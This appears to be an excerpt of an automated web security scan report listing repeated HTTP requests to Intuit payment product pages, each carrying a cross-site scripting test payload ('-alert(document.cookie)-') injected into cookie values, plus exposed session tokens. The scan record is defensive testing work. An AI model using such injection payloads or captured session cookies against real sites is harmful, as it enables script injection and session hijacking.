GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/index.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/echecks-and-check-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/internet-merchant-accounts.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/online-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
